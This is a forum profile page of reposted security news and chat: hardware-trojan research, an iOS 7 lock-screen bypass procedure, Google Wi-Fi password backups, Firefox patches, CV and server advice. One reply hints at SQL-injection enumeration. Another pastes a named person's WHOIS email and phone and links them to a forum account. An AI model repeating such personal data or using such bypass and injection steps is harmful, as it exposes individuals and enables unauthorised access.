-
Posts
18725 -
Joined
-
Last visited
-
Days Won
706
Everything posted by Nytro
-
nteger overflow/underflow exploitation tutorial By Saif El Sherei www.elsherei.com Introduction: I decided to get a bit more into Linux exploitation, so I thought it would be nice if I document this as a good friend once said “ you think you understand something until you try to teach it “. This is my first try at writing papers. This paper is my understanding of the subject. I understand it might not be complete I am open for suggestions and modifications. I hope as this project helps others as it helped me. This paper is purely for education purposes. Note: the Exploitation methods explained in the below tutorial will not work on modern system due to NX, ASLR, and modern kernel security mechanisms. If we continue this series we will have a tutorial on bypassing some of these controls What is an integer? An integer in computing is a variable holding a real number without fractions. The size of int is depending on the architecture. So on i386 arch (32-bit) the int is 32-bits. An integer is represented in memory in binary. Download: http://packetstorm.igor.onlinedirect.bg/papers/attack/overflowunderflow-tutorial.pdf
-
'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs Tinfoil hat brigade say every PC is on mobile networks, even when powered down By Richard Chirgwin, 23rd September 2013 Intel has apparently turned up one of the holiest of holy grails in the tech sector, accidentally creating an zero-power-consumption on-chip 3G communications platform as an NSA backdoor. The scoop comes courtesy of tinfoil socialist site Popular Resistance, in this piece written by freelance truther Jim Stone, who has just discovered the wake-on-LAN capabilities in vPro processors. He writes: “The new Intel Core vPro processors contain a new remote access feature which allows 100 percent remote access to a PC 100 percent of the time, even if the computer is turned off. Core vPro processors contain a second physical processor embedded within the main processor which has it’s own operating system embedded on the chip itself. As long as the power supply is available and and in working condition, it can be woken up by the Core vPro processor, which runs on the system’s phantom power and is able to quietly turn individual hardware components on and access anything on them.” A little background: Popular Resistance was formed in 2011 and was part of the 'Occupy' movement, having done its bit in Washington DC. It now promotes an anti-capitalist agenda. Back to Stone, who says Intel can do all the stuff vPro enables thanks to an undocumented 3G radio buried on its chips apparently extends wake-on-LAN to wake-on-mobile: “Core vPro processors work in conjunction with Intel’s new Anti Theft 3.0, which put 3g connectivity into every Intel CPU after the Sandy Bridge version of the I3/5/7 processors. Users do not get to know about that 3g connection, but it IS there,” he writes, “anti theft 3.0 always has that 3G connection on also, even if the computer is turned off” (emphasis added). No evidence is offered for the assertions detailed above. And with that, El Reg will now happily open the floor to the commentards … ® Sursa: 'Occupy' affiliate claims Intel bakes SECRET 3G radio into vPro CPUs • The Register
-
Daca tot nu aveti ce face cu 20 de euro, imi dati mie bautura de ei.
-
Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs New technique bakes super stealthy hardware trojans into chip silicon. by Dan Goodin - Sept 18 2013, 5:57pm GTBST Janet Lackey Scientists have developed a technique to sabotage the cryptographic capabilities included in Intel's Ivy Bridge line of microprocessors. The technique works without being detected by built-in tests or physical inspection of the chip. The proof of concept comes eight years after the US Department of Defense voiced concern that integrated circuits used in crucial military systems might be altered in ways that covertly undermined their security or reliability. The report was the starting point for research into techniques for detecting so-called hardware trojans. But until now, there has been little study into just how feasible it would be to alter the design or manufacturing process of widely used chips to equip them with secret backdoors. In a recently published research paper, scientists devised two such backdoors they said adversaries could feasibly build into processors to surreptitiously bypass cryptographic protections provided by the computer running the chips. The paper is attracting interest following recent revelations the National Security Agency is exploiting weaknesses deliberately built-in to widely used cryptographic technologies so analysts can decode vast swaths of Internet traffic that otherwise would be unreadable. The attack against the Ivy Bridge processors sabotages random number generator (RNG) instructions Intel engineers added to the processor. The exploit works by severely reducing the amount of entropy the RNG normally uses, from 128 bits to 32 bits. The hack is similar to stacking a deck of cards during a game of Bridge. Keys generated with an altered chip would be so predictable an adversary could guess them with little time or effort required. The severely weakened RNG isn't detected by any of the "Built-In Self-Tests" required for the P800-90 and FIPS 140-2 compliance certifications mandated by the National Institute of Standards and Technology. The tampering is also undetectable to the type of physical inspection that's required to ensure a chip is "golden," a term applied to integrated circuits known to not include malicious modifications. Christof Paar, one of the researchers, told Ars the proof-of-concept hardware trojan relies on a technique that requires low-level changes to only a "few dozen transistors." That represents a minuscule percentage of the more than 1 billion transistors overall. The tweaks alter the transistors' and gates' "doping polarity," a change that adds a small number of atoms of material to the silicon. Because the changes are so subtle, they don't show up in physical inspections used to certify golden chips. "We want to stress that one of the major advantages of the proposed dopant trojan is that [it] cannot be detected using optical reverse-engineering since we only modify the dopant masks," the researchers reported in their paper. "The introduced trojans are similar to the commercially deployed code-obfuscation methods which also use different dopant polarity to prevent optical reverse-engineering. This suggests that our dopant trojans are extremely stealthy as well as practically feasible." Besides being stealthy, the alterations can happen at a minimum of two points in the supply chain. That includes (1) during manufacturing, where someone makes changes to the doping, or (2) a malicious designer making changes to the layout file of an integrated circuit before it goes to manufacturing. In addition to the Ivy Bridge processor, the researchers applied the dopant technique to lodge a trojan in a chip prototype that was designed to withstand so-called side channel attacks. The result: cryptographic keys could be correctly extracted on the tampered device with a correlation close to 1. (In fairness, they found a small vulnerability in the trojan-free chip they used for comparison, but it was unaffected by the trojan they introduced.) The paper was authored by Georg T. Becker of the University of Massachusetts, Amherst; Francesco Regazzoni of TU Delft, the Netherlands and ALaRI, University of Lugano, Switzerland; Paar of UMass; Horst Gortz Institut for IT-Security, Ruhr-Universitat, Bochum, Germany; and Wayne P. Burleson of UMass. In an e-mail, Paar stressed that no hardware trojans have ever been found circulating in the real world and that the techniques devised in the paper are mere proofs of concept. Still, the demonstration suggests the covert backdoors are technically feasible. It wouldn't be surprising to see chip makers and certifications groups respond with new ways to detect these subtle changes. Sursa: Researchers can slip an undetectable trojan into Intel’s Ivy Bridge CPUs | Ars Technica
-
NSA: Snowden was just doing his job ummary: More details emerge on how Edward Snowden was able to gain access to and copy so much secret information. His job provided the perfect cover for his illegal activities. In response, the NSA is making like the TSA and fighting the last war. By Larry Seltzer for Zero Day | September 19, 2013 Interviews with two NSA officials by National Public Radio reveal a tragic irony of Edward Snowden's theft and leaking of classified documents: He was just doing his job. One of the lessons learned from the investigations of the 9/11 Commission was that there was insufficient sharing of intelligence information. In order to facilitate such sharing, the NSA created a file sharing area on the Agency's intranet site. NSA officials told NPR that all of the documents Snowden has leaked came from that sharing area. * "Unfortunately for us," one official said, "if you had a top secret SCI [sensitive compartmented information] clearance, you got access to that." Not only did Snowden have such access, but as a System Administrator it was part of his job to search through the shared area for documents which belonged in more restrictive areas and move them. From the NPR article: "It's kind of brilliant, if you're him," an official said. "His job was to do what he did. He wasn't a ghost. He wasn't that clever. He did his job. He was observed [moving documents], but it was his job." It's a little more complicated than Snowden literally doing his job, although the job was the perfect cover for his activities. The article also notes that the NSA was, at the time, allowing users access to USB ports on computers which had access to the sensitive data. They have, more recently, closed off access to those ports, which Snowden likely used to copy data from NSA systems to a USB thumb drive. Incredibly, this is the same method used by Bradley Manning long ago, but the NSA didn't react to that news. Restricting access to USB ports has been a standard feature of Windows system management for many years and there are 3rd party products that do this as well. The NSA has implemented other practices, including document tagging, to prevent what Snowden did. The tags will restrict access to the documents and track their usage. It's all another example of fighting the last war. The NSA, in this way, is following the example of the TSA. Sursa: NSA: Snowden was just doing his job | ZDNet
-
iOS 7 lock screen bypass flaw discovered, and how to fix it
Nytro posted a topic in Stiri securitate
iOS 7 lock screen bypass flaw discovered, and how to fix it Summary: UPDATED 2: The iOS 7 lock screen can be bypassed with a series of gesture techniques, despite the passcode. While apps are blurred out, a major Camera app bug exists, which can allow photos to be edited, deleted, and shared with others while the device is still locked. By Zack Whittaker for Zero Day | September 19, 2013 Just one day after Apple's latest mobile operating system iOS 7 was released to the public, one user discovered a security vulnerability in the software's lock screen. In a video posted online, Canary Islands-based soldier Jose Rodriguez detailed the flaw, which allowed him to access the multitasking view of the software without entering a passcode. With this, it's apparent which apps are open and how many notifications there are, as well as the device's home screen. The video, replicated below, shows the sequence of presses and taps that make this exploit possible, despite being fiddly and taking many attempts. The first step is to bring up the device's Control Center and accessing the Clock app, then hold down the power button until you are given the on-screen prompt to shut down the device. After you hit cancel, immediately double-tapping the home button brings up the multitasking view as expected. ZDNet confirmed this bug exists on an array of devices. In our New York newsroom, we tested on iOS 7 on an iPhone 4S, an iPhone 5, and the new iPhone 5c. All devices were exploited in the same way with the lock screen bypass technique, and all devices acted in exactly the same fashion. However, upon further examination, it's possible to access an array of photos under the Camera Roll, and thus access to sharing features — including Twitter. If the Camera app is opened first (provided it is accessible from the lock screen), by exploiting the same sequence of presses, the Camera Roll opens up. From here, images can be deleted, uploaded, edited, and shared with others. These screenshots were taken of an iPhone 4S, giving access to photos and sharing features, despite being locked with a passcode. (Image: ZDNet) You can see in the video (below) that even though the multitasking view — which offers a much larger view than previous iOS iterations — is viewable, the contents of the apps are not visible. iOS 7 blurs the contents of the apps, meaning would-be attackers cannot see what is going on. The only exception is the home screen, which is viewable, including which apps have been installed, along with the user's wallpaper. Despite the flaw, iOS 7 patches 80 security vulnerabilities, according to ZDNet's Larry Seltzer. But this kind of flaw, albeit minor, may not install a vast amount of confidence in users already jarred by the new design and user interface. Rodriguez also found a bug in iOS 6.1.3, which allowed potential hackers to access an iPhone running vulnerable software by ejecting the SIM card tray. Until Apple issues an official fix, iOS 7 users can simply disabling access to the Control Center on the lock screen. In Settings, then Control Center. From here, swipe the option on Access on Lock Screen so that it no longer displays on the lock screen. We put in a request for comment to Apple but did not hear back at the time of writing. An Apple spokesperson told AllThingsD, however, that the company is "aware" of the issue and will deliver a fix soon. Updated at 4:15 p.m. ET: with additional details regarding the Camera app. Also added additional attribution to Forbes, which was mistakenly omitted from the original piece. (via Forbes) Sursa: iOS 7 lock screen bypass flaw discovered, and how to fix it | ZDNet -
Intro To Linux System Hardening And Applying It To Your Pentest System Description: Chris Jenks (rattis) talks about hardening Linux and how you can apply that logic to your pentest system so you don't fall prey to the hack back. For More information please visit : - Security B-Sides / BSidesDetroitConversations Sursa: Intro To Linux System Hardening And Applying It To Your Pentest System
-
Mie imi spune mai multe acel "Internet Explorer". Pune si tu un exploit de IE si vezi tu cine sunt aia de fapt. Puf: https://community.rapid7.com/community/metasploit/blog/2013/05/05/department-of-labor-ie-0day-now-available-at-metasploit
-
Google knows nearly every Wi-Fi password in the world By Michael Horowitz September 12, 2013 10:44 PM EDT If an Android device (phone or tablet) has ever logged on to a particular Wi-Fi network, then Google probably knows the Wi-Fi password. Considering how many Android devices there are, it is likely that Google can access most Wi-Fi passwords worldwide. Recently IDC reported that 187 million Android phones were shipped in the second quarter of this year. That multiplies out to 748 million phones in 2013, a figure that does not include Android tablets. Many (probably most) of these Android phones and tablets are phoning home to Google, backing up Wi-Fi passwords along with other assorted settings. And, although they have never said so directly, it is obvious that Google can read the passwords. Sounds like a James Bond movie. Android devices have defaulted to coughing up Wi-Fi passwords since version 2.2. And, since the feature is presented as a good thing, most people wouldn't change it. I suspect that many Android users have never even seen the configuration option controlling this. After all, there are dozens and dozens of system settings to configure. And, anyone who does run across the setting can not hope to understand the privacy implication. I certainly did not. Specifically: In Android 2.3.4, go to Settings, then Privacy. On an HTC device, the option that gives Google your Wi-Fi password is "Back up my settings". On a Samsung device, the option is called "Back up my data". The only description is "Back up current settings and application data". No mention is made of Wi-Fi passwords. In Android 4.2, go to Settings, then "Backup and reset". The option is called "Back up my data". The description says "Back up application data, Wi-Fi passwords, and other settings to Google servers". Needless to say "settings" and "application data" are vague terms. A longer explanation of this backup feature in Android 2.3.4 can be found in the Users Guide on page 374: Check to back up some of your personal data to Google servers, with your Google Account. If you replace your phone, you can restore the data you’ve backed up, the first time you sign in with your Google Account. If you check this option, a wide variety of you personal data is backed up, including your Wi-Fi passwords, Browser bookmarks, a list of the applications you’ve installed, the words you’ve added to the dictionary used by the onscreen keyboard, and most of the settings that you configure with the Settings application. Some third-party applications may also take advantage of this feature, so you can restore your data if you reinstall an application. If you uncheck this option, you stop backing up your data to your account, and any existing backups are deleted from Google servers. A longer explanation for Android 4.0 can be found on page 97 of the Galaxy Nexus phone users Guide: If you check this option, a wide variety of your personal data is backed up automatically, including your Wi-Fi passwords, Browser bookmarks, a list of the apps you've installed from the Market app, the words you've added to the dictionary used by the onscreen keyboard, and most of your customized settings. Some third-party apps may also take advantage of this feature, so you can restore your data if you reinstall an app. If you uncheck this option, your data stops getting backed up, and any existing backups are deleted from Google servers. Sounds great. Backing up your data/settings makes moving to a new Android device much easier. It lets Google configure your new Android device very much like your old one. What is not said, is that Google can read the Wi-Fi passwords. And, if you are reading this and thinking about one Wi-Fi network, be aware that Android devices remember the passwords to every Wi-Fi network they have logged on to. The Register writes The list of Wi-Fi networks and passwords stored on a device is likely to extend far beyond a user's home, and include hotels, shops, libraries, friends' houses, offices and all manner of other places. Adding this information to the extensive maps of Wi-Fi access points built up over years by Google and others, and suddenly fandroids face a greater risk to their privacy if this data is scrutinised by outside agents. The good news is that Android owners can opt out just by turning off the checkbox. Update: Sept 15, 2013: Even if Google deletes every copy of your backed up data, they may already have been compelled to share it with others. And, Google will continue to have a copy of the password until every Android device that has ever connected to the network turns off the backing up of settings/data. The bad news is that, like any American company, Google can be compelled by agencies of the U.S. government to silently spill the beans. When it comes to Wi-Fi, the NSA, CIA and FBI may not need hackers and cryptographers. They may not need to exploit WPS or UPnP. If Android devices are offering up your secrets, WPA2 encryption and a long random password offer no protection. I doubt that Google wants to rat out their own customers. They may simply have no choice. What large public American company would? Just yesterday, Marissa Mayer, the CEO of Yahoo, said executives faced jail if they revealed government secrets. Lavabit felt there was a choice, but it was a single person operation. This is not to pick on Google exclusively. After all, Dropbox can read the files you store with them. So too, can Microsoft read files stored in SkyDrive. And, although the Washington Post reported back in April that Apple’s iMessage encryption foils law enforcement, cryptographer Matthew Green did a simple experiment that showed that Apple can read your iMessages. In fact, Green's experiment is pretty much the same one that shows that Google can read Wi-Fi passwords. He describes it: First, lose your iPhone. Now change your password using Apple's iForgot service ... Now go to an Apple store and shell out a fortune buying a new phone. If you can recover your recent iMessages onto a new iPhone -- as I was able to do in an Apple store this afternoon -- then Apple isn't protecting your iMessages with your password or with a device key. Too bad. Similarly, a brand new Android device can connect to Wi-Fi hotspots it is seeing for the very first time. Back in June 2011, writing for TechRepublic, Donovan Colbert described stumbling across this on a new ASUS Eee PC Transformer tablet: I purchased the machine late last night after work. I brought it home, set it up to charge overnight, and went to bed. This morning when I woke I put it in my bag and brought it to the office with me. I set up my Google account on the device, and then realized I had no network connection ... I pulled out my Virgin Mobile Mi-Fi 2200 personal hotspot and turned it on. I searched around Honeycomb looking for the control panel to select the hotspot and enter the encryption key. To my surprise, I found that the Eee Pad had already found the Virgin hotspot, and successfully attached to it ... As I looked further into this puzzling situation, I noticed that not only was my Virgin Hotspot discovered and attached, but a list of other hotspots ... were also listed in the Eee Pad's hotspot list. The only conclusion that one can draw from this is obvious - Google is storing not only a list of what hotspots you have visited, but any private encryption keys necessary to connect to those hotspots ... Micah Lee, staff technologist at the EFF, CTO of the Freedom of the Press Foundation and the maintainer of HTTPS Everywhere, blogged about the same situation back in July. When you format an Android phone and set it up on first run, after you login to your Google account and restore your backup, it immediately connects to wifi using a saved password. There’s no sort of password hash that your Android phone could send your router to authenticate besides the password itself. Google stores the passwords in a manner such that they can decrypt them, given only a Gmail address and password. Shortly after Lee's blog, Ars Technica picked up on this (see Does NSA know your Wi-Fi password? Android backups may give it to them). A Google spokesperson responded to the Ars article with a prepared statement. Our optional ‘Backup my data’ feature makes it easier to switch to a new Android device by using your Google Account and password to restore some of your previous settings. This helps you avoid the hassle of setting up a new device from scratch. At any point, you can disable this feature, which will cause data to be erased. This data is encrypted in transit, accessible only when the user has an authenticated connection to Google and stored at Google data centers, which have strong protections against digital and physical attacks. Sean Gallagher, who wrote the Ars article, added "The spokesperson could not speak to how ... the data was secured at rest." Lee responded to this with: ... it’s great the backup/restore feature is optional. It’s great that if you turn it off Google will delete your data. It’s great that the data is encrypted in transit between the Android device and Google’s servers, so that eavesdroppers can’t pull your backup data off the wire. And it’s great they they have strong security, both digital and physical, at their data centers. However, Google’s statement doesn’t mention whether or not Google itself has access to the plaintext backup data (it does)... [The issue is] Not how easy it is for an attacker to get at this data, but how easy it is for an authorized Google employee to get at it as part of their job. This is important because if Google has access to this plaintext data, they can be compelled to give it to the US government. Google danced around the issue of whether they can read the passwords because they don't want people like me writing blogs like this. Maybe this is why Apple, so often, says nothing. Eventually Lee filed an official Android feature request, asking Google to offer backups that are stored in such a way that only the end user (you and I) can access the data. The request was filed about two months ago and has been ignored by Google. I am not revealing anything new here. All this has been out in the public before. Below is a partial list of previous articles. However, this story has, on the whole, flown under the radar. Most tech outlets didn't cover it (Ars Technica and The Register being exceptions) for reasons that escape me. 1) Google knows where you've been and they might be holding your encryption keys. June 21, 2011 by Donovan Colbert for TechRepublic. This is the first article I was able to find on the subject. Colbert was not happy, writing: ... my corporate office has a public, protected wireless access point. The idea that every Android device that connects with that access point shares our private corporate access key with Google is pretty unacceptable ... This isn't just a trivial concern. The fact that my company can easily lose control of their own proprietary WPA2 encryption keys just by allowing a user with an Android device to use our wireless network is significant. It illustrates a basic lack of understanding on the ethics of dealing with sensitive corporate and personal data on the behalf of the engineers, programmers and leadership at Google. Honestly, if there is any data that shouldn't be harvested, stored and synched automatically between devices, it is encryption keys, passcodes and passwords. 2) Storage of credentials on the company servers Google by Android smartphones (translated from German). July 8, 2013. The University of Passau in Germany tells the university community to turn off Android backups because disclosing passwords to third parties is prohibited. They warn that submitting your password to any third party lets unauthorised people access University services under your identity. They also advise changing all passwords stored on Android devices. 3) Use Android? You’re Probably Giving Google All Your Wifi Passwords July 11, 2013 by Micah Lee. Where I first ran into this story. 4) Android and its password problems open doors for spies July 16, 2013 by The H Security in Germany. Excerpt: Tests ... at heise Security showed that after resetting an Android phone to factory settings and then synchronising with a Google account, the device was immediately able to connect to a heise test network secured using WPA2. Anyone with access to a Google account therefore has access to its Wi-Fi passwords. Given that Google maintains a database of Wi-Fi networks throughout the world for positioning purposes, this is a cause for concern in itself, as the backup means that it also has the passwords for these networks. In view of Google's generosity in sharing data with the NSA, this now looks even more troubling ... European companies are unlikely to be keen on the idea of this backup service, activated by default, allowing US secret services to access their networks with little effort. 5) Does NSA know your Wi-Fi password? Android backups may give it to them July 17, 2013 by Sean Gallagher for Ars Technica. This is the article referred to earlier. After this one story, Ars dropped the issue, which I find strange since they must have realized the implications. 6) Android backup sends unencrypted Wi-Fi passwords to Google July 18, 2013 by Zeljka Zorz for net-security.org 7) Would you tell Google your Wi-Fi password? You probably already did... July 18, 2013 by Paul Ducklin writing for the Sophos Naked Security blog. Ducklin writes ... the data is encrypted in transit, and Google (for all we know) probably stores it encrypted at the other end. But it's not encrypted in the sense of being inaccessible to anyone except you ... Google can unilaterally recover the plaintext of your Wi-Fi passwords, precisely so it can return those passwords to you quickly and conveniently ... 8) Android Backups Could Expose Wi-Fi Passwords to NSA July 19, 2013 by Ben Weitzenkorn of TechNewsDaily. This same story also appeared at nbcnews.com and mashable.com. 9) Despite Google’s statement, they still have access to your wifi passwords July 19, 2013 by Micah Lee on his personal blog. Lee rebuts the Google spokesperson response to the Ars Technica article. 10) Oi, Google, you ate all our Wi-Fi keys - don't let the spooks gobble them too July 23, 2013 by John Leyden for The Register. Leyden writes: "Privacy experts have urged Google to allow Android users' to encrypt their backups in the wake of the NSA PRISM surveillance flap." 11) Google: Keep Android Users' Secure Network Passwords Secure August 5, 2013 by Micah Lee and David Grant of the EFF. They write Fixing the flaw is more complicated than it might seem. Android is an open source operating system developed by Google. Android Backup Service is a proprietary service offered by Google, which runs on Android. Anyone can write new code for Android, but only Google can change the Android Backup Service. To conclude on a Defensive Computing note, those that need Wi-Fi at home should consider using a router offering a guest network. Make sure that Android devices accessing the private network are not backing up settings to Google. This is not realistic for the guest network, but you can enable the guest network only when needed and then shut it down afterwards. Also, you can periodically change the password of the guest network without impacting your personal wireless devices. At this point, everybody should probably change their Wi-Fi password. Sursa: Google knows nearly every Wi-Fi password in the world | Computerworld Blogs
-
Calm, din cate stiu majoritatea institutiilor statului sunt gazduite si au acces la Internet prin STS. De exemplu Academia Tehnica Militara, o facutate din Bucuresti, are IP-uri tot de la STS.
-
Cluefire and Damnation I don't see what C++ has to do with keeping people from shooting themselves in the foot. C++ will happily load the gun, offer you a drink to steady your nerves, and help you aim. -- Peter da Silva Link: http://cluefire.net/
-
Vulnerabilitati Web si securizarea acestora
-
eusimplu : E ok oricum, doar sugerez ca in CV sa apara titlurile articolelor mai importante, care pot avea valoare pentru angajator. UnUser : Facultatea te poate invata multe lucruri: mai multe limbaje de programare, algoritmi, te poate "forta" sa faci proiecte si foarte important, te poate invata sa lucrezi in echipa. Astfel de lucruri ajuta mult dupa angajare. Cateva idei as mai vrea sa va dau: 1. Creati-va CV-ul in functie de postul pe care vreti sa il ocupati: daca vreti sa fiti programator C++, treceti cat mai multe lucruri, chiar si proiecte foarte mici si incercati sa evitati alte lucruri cum ar fi proiecte web: PHP sau altceva 2. Nu folositi anumite sabloane pentru prezentare, nu depasiti 3 pagini si puneti accent pe ceea ce considerati ca vrea sa vada un angajator. A, faceti un mail special pentru angajare, x_dark_sexos_boy@yahoo.com nu cred ca il va atrage pe angajator
-
E doar un sfat: - Faceti CV-ul - Puneti toate proiectele la care ati lucrat - Puneti toate articolele pe care le-ati scris - Puneti limbajele de programare pe care le cunoasteti (adica ati scris cel putin 2000-3000 de linii de cod in acel limbaj, ati citit o carte si nu un tutorial de 2 lei pentru a invata sau ati urmat niste cursuri) - Mentionati tot ce considerati ca ar putea fi util Apoi, dupa ce CV-ul e gata: 1. Cititi-l si faceti-va o impresie despre cum va petreceti timpul frecand menta 2. Ganditi-va ce veti face pe viitor: vreti sa lucrati in domeniu, sau sa faceti shaorma? 3. Ganditi din perspectiva unui angajator. Vrei sa angajezi pe cineva care are CV-ul ca al tau. Ce faci? Postati aici concluziile. NU postati date personale din CV, puteti posta la ce proiecte ati lucrat de exemplu. Spuneti-va parerea, ce rezultate au iesit, cat de multumiti sunteti de voi pana in prezent. FACETI CV-ul, nu doar va ganditi la el. Stiu ca unii sunteti tineri, dar veti ajunge sa il faceti si cred ca o sa va fie util daca va ganditi de acum la acest lucru. Bafta!
-
Firefox 24 Patches 17 Security Vulnerabilities by Brian Donohue he Mozilla Foundation released Firefox 24 yesterday, issuing 17 security patches for the browser. Seven of the bulletins received the highest, critical impact rating, four are considered high impact advisories, the second most severe rating, and the remaining six are of moderate impact. Mozilla’s patch contained more total and critically rated advisories than any other since January. According to Mozilla’s security advisories, critical impact bugs are those that give attackers the ability to run code or install malicious software with no user interaction beyond typical browsing: The first critical advisory, MFSA 2013-92, resolves a garbage collection hazard with default compartments and frame chain. The bug, which could be exploited to establish a use after free scenario, was uncovered by a security researcher operating under the handle Nils and a Mozilla developer named Bobby Holley. MFSA 2013-90 is a pair memory corruption bugs also reported by Nils. The first led to a use after free condition while scrolling through an image document and the second had to do with nodes in a range request being added as children of two different parents. Security researcher Aki Helin reported found that combining lists, floats, and multiple columns could trigger an exploitable buffer overflow, which mozilla fixes with MFSA 2013-89. Using the address sanitizer tool, researcher Scott Bell discovered a use-after-free condition after destroying a <select> element form. If MSFA 2013-81 goes unpatched, it could lead to a potentially exploitable crash. Chrome security team member Abhishek Arya found a crashable use-after-free problem (MSFA 2013-79) in the Animation Manager while also using the address sanitizer tool. MSFA 2013-78 patches an integer overflow bug, discovered by Alex Chapman, in the Almost Native Graphics Layer Engine (ANGLE) library that Mozilla uses. The vulnerability existed because “of insufficient bounds checking in the drawLineLoop function, which can be driven by web content to overflow allocated memory, leading to a potentially exploitable crash.” The last critical impact bulletin, MSFA 2013-76, fixes a handful of memory safety hazards uncovered by Mozilla developers. The four high impact advisories fix a JavaScript compartment mismatch issue, an issue in Firefox for Android that allows the loading of shared objects from writeable locations, Mozilla’s failure to lock MAR files after signature verification, a problem that could potentially allow an attacker to run executable files, and another crash-bug that has to do with the calling scope for JavaScript objects. High impact vulnerabilities are those that an attacker can exploit to gather sensitive data from other sites the user is visiting or inject data or code into those sites, also while the user is browsing normally. Moderate impact bugs are high of critical impact bugs that an attacker could only exploit under uncommon circumstances when a user is running non-default configurations. Mozilla’s fixes for these bugs are as follows: user-defined properties on DOM proxies get the wrong “this” object, WebGL Information disclosure through OS X NVIDIA graphic drivers, uninitialized data in IonMonkey, same-origin bypass through symbolic links, NativeKey continues handling key messages after widget is destroyed, and improper state in HTML5 Tree Builder with templates. Sursa: Mozilla 24 Resolves 17 Security Vulnerabilities | Threatpost
-
Folosesti Windows server daca ai o retea de calculatoare cu Windows pe care vrei sa le pui intr-un domeniu, folosesti Sharepoint, Outlook (deci Exchange), SQL Server, gazduire ASP.NET si alte servicii Microsoft. Nu ma pricep prea bine, dar m-am uitat si eu pe un Windows server si e foarte usor de configurat. Practic iti ofera un GUI din care faci tot ce vrei: configurare IIS, site-uri in ASP.NET si o gramada de alte porcarii. Pentru toate celelalte exista Linux.
-
A, deci servar nu e ala de Counter-Strike Cateva idei ale mele ar fi urmatoarele: 1. Serverele sunt masini (ca hardware) mult mai puternice: procesoare mai puternice, deseori mai multe procesoare, mai multa memorie RAM: 8 GB, 16 GB, 32 GB, 48 GB sau chiar mai mult 2. Procesoarele sunt special pentru servere. Cu alte cuvinte, daca o firma iti ofera server cu procesor i3, i5, i7, le dai muie, alea sunt procesoare pentru laptop-uri nu pentru servere. Pe server un procesor trebuie sa poata rula ani de zile fara a fi oprit, nu sa ia foc (probabil) ca un i*. 3. Capacitate de stocare mare: cand e necesar, 2 TB sau 500 GB SSD de exemplu sunt ok 4. Ca aspect fizic, de cele mai multe ori serverele sunt niste blade-uri (aici) pentru a putea fi puse usor unul langa altul. E foarte util deoarece de cele mai multe ori firmele au foarte multe servere identice si astfel sunt foarte usor de montat 5. Din punct de vedere hardware au fosrte multe porturi: Gigabit, mai multe slot-uri pentru RAM, multe slot-uri pentru hard-disk-uri si multe altele. Astfel poti configura un server cum doresti 6. Consuma mai mult curent electric si au nevoie de racire constanta. Datacenter-ele au propriile sisteme de racire si generatoare de rezerva Cam astea ar fi ideile cele mai importante.
-
Avira lanseaza gama de produse 2014 in testare beta By Radu FaraVirusi(com) on September 17, 2013 [TABLE=class: tssbar, width: 60, align: center] [TR] [/TR] [TR] [/TR] [TR] [/TR] [TR] [TD=align: center][/TD] [/TR] [/TABLE] De curand Avira si-a anuntat beta testerii ca versiunea 2014 a fost lansata pentru testare. In afara de mici (chiar inobservabile) modificari in grafica, nu exista nicio modificare notabila in sensul adaugarii unor module noi sau imbunatatiri ale celor existente. Firewall-ul, backup-ul si filtrul anti-spam au fost indepartate din noua gama de produse. In locul firewall-ului este inclus un pachet ceva mai avansat de configurare a Windows Firewall. Iata si lista oficiala a modificarilor: Discontinued features Avira Antispam (aka SPACE) is discontinued and removed from the offer. It was in Internet Security and Internet Security Plus. Local Backup is discontinued and removed from the offer. It was in Internet Security and Internet Security Plus. Avira FW is discontinued and replaced with Windows Firewall Management for OS higher than Vista.. Additional changes / bugfixes in all products Enable WFP on Win7 and Win 8 for all products that need it Remove the safe start functionality from all products and all OS Known Issues Symbol check fails on several files WSCSVC (Windows Security Center Service) shows that Avira is still set as AV Software after uninstallation when the WSCSVC is set to manual start AntiVir Service will hang sometimes after multiple restarts Systray icon might be missing even though avgnt.exe is running Purchase links for Internet Security Suite are broken LSP Mailguard does not close socket after detection MD5 mismatch will show up during update from AV13 ISEC to AV14 Free version will be available later next week Stau si ma intreb pe buna dreptate cui foloseste aceasta versiune noua si de ce trebuie sa se numeasca 2014 cand este chiar sub 2013 ?! In orice caz, o puteti testa si voi, pentru a nu fi acuzat de partinire, la adresa: https://betacenter.avira.com/ Sursa: Avira lanseaza gama de produse 2014 in testare beta
-
for(int i=0;i<n/2;i++){ for(int j=i+1;j<n;j++){ Edit: Scuze, nu e ok, primul "for" merge doar pana la n/2. Avem: (n-1)+(n-2)+...+(n-n/2). Adica mult mai putin. De ce? La i == 0 avem (n-1) pasi La i == 1 avem (n-2) pasi ... La i == n/2 - 1 avem (n - n/2) pasi Rezultatul e suma acestor adunari. Mai exact: n(n-1)/2 - ( n/2 * (n/2 + 1) )/2 Adica suma lui Gauss de la 1 la n-1 din care scadem suma lui Gauss de la 1 la n/2. Cred ca rezultatul final e: 3n(n-2) / 8. Sper ca nu m-am incurcat pe acolo: http://i.imgur.com/ebAxHOO.jpg
-
Vezi ce se poate scoate. Scoate CURRENT_USER sa vezi hostname-ul.
-
Lasa-ma sa ghicesc: esti un membru vechi cu un cont nou. Nu stiu de ce, dar toti, cand "reveniti" sub un alt nume incepeti sa folositi diacritice.
-
Administrative Name: Vasilica Ciobotaru Administrative Company: Vasilica Ciobotaru Administrative Address: Convento Administrative Address: Torrelguna Administrative Address: Madrid Administrative Address: 28180 Administrative Address: ES Administrative Email: ciobi72@yahoo.com Administrative Tel: +34.666816641 Adica el: https://rstforums.com/forum/members/eta/
-
64bit Pointer Truncation in Meterpreter If you haven’t ever heard of Meterpreter before, you might want to go and take a look at it before reading this post to help give some context. In short, Meterpreter is an amazing library that is part of the Metasploit Framework and can be used to give you tremendous power and control over target machines during a penetration test. Anyone and everyone in the security game is most likely familiar with both Metasploit and Meterpreter, at the very least, if not closely intimate with them. The toolset is fantastic, and is open source! I’m currently in the very fortunate position of working with the crew from Rapid7 to help improve Meterpreter, particularly on the Windows (both 32 and 64 bit). I have a good list of things to work through while I’m on board including making it easier to build for potential contributors, and to fix some outstanding issues that the R7 crew haven’t had the bandwidth to fix. These people are super-smart, and super-nice and I’m honoured that I’ve been selected to work alongside them. The purpose of this post is to document the process and resolution of a bug that I have helped resolve since joining. I also aim to lift the lid on Meterpreter a little and help expose how some bits of it work. I hope you enjoy. Meterpreter Basics When exploiting a vulnerability during a penetration test using Metasploit, you have a number of payloads that you choose to use which give you some sort of control over your target. Of those payloads, Metepreter is not only the most common, but is probably the most powerful. Once you have an instance of Metepreter running on a target, you’ve got quite a lot of control. You can escalate privileges, dump password hashes, launch 